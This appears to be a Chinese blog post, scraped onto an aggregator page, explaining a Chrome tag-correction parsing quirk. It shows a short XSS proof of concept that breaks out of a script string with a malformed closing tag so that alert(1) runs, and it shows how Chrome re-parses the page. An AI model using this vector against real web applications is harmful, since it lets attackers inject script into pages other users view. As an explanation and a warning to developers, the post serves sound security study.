chrome标签修正特性漏洞
来源:互联网 发布:门面广告牌制作软件 编辑:程序博客网 时间:2024/05/17 07:46
之前的那篇给出了chrome标签修正特性漏洞的两个原型,是在老外发出的11的漏洞思路上的再延展。
我说这个是只属于chrome xss filter的标签修正特性有点误导,这个是全局的,来看下面老外发的这个漏洞
http://code.google.com/p/chromium/issues/detail?id=68484
测试代码是
<script><!--
var x = "pwned</script x\><script x\>alert(1);//";
//--></script>
结果被修正为
<html>
<head>
<script><!--
var x = "pwned</script>
<script x\>alert(1);//";
//--></script>
<script></script>
</head>
<body></body>
</html>
chrome动态修正了这个HTML文档的3处节点:
1. </script x\> 修正为 </script>
2. 闭合了<script x\>
3. 闭合多出的</script>
chrome的标签修正特性只是按标签配对来修正的,没有考虑HTML注释或其他复杂的情况,所以alert(1)执行了!
深入分析就会发现chrome的标签修正特性漏洞影响深远,在各种复杂的应用环境中会产生漏洞。
黑客不仅可以用于非持久型的XSS漏洞,还能用于富文本环境中,也提醒各位程序员和安全工程师,你在服务端精心布置的安全防御策略,可能会被客户端歪曲修正为安全漏洞。
- chrome标签修正特性漏洞
- chrome的背景色修正
- Chrome漏洞又出现
- 【Chrome】chrome架构及特性
- php5 特性漏洞
- chrome开发工具特性
- chrome浏览器新特性
- JS关闭chrome标签
- chrome标签切换慢
- Chrome 切换标签快捷键
- Chrome 标签跳转
- Chrome标签整理
- 对三级标签理解的一些修正
- c语言 二分法查找 修正版 漏洞 二分法 32位
- chrome开发工具特性2
- Chrome 57 Beta 新特性
- html5~标签新特性
- Chrome双击关闭网页标签
- 股票研读
- 伤不起啊,信息
- 在Delphi中静态调用DLL 引用外部Dll External Dll 导入Dll
- 好久没来这儿关顾了
- python 邮件自动发送客户端
- chrome标签修正特性漏洞
- Delphi Format函数用法
- Excel VBA - Sheet对象
- Java自定义的类加载器
- delphi6 函数大全使用详解
- 一元多项式的相加减
- 小弟开博客啦
- Delphi 中串口通讯的实现
- C++ Heap corruption detected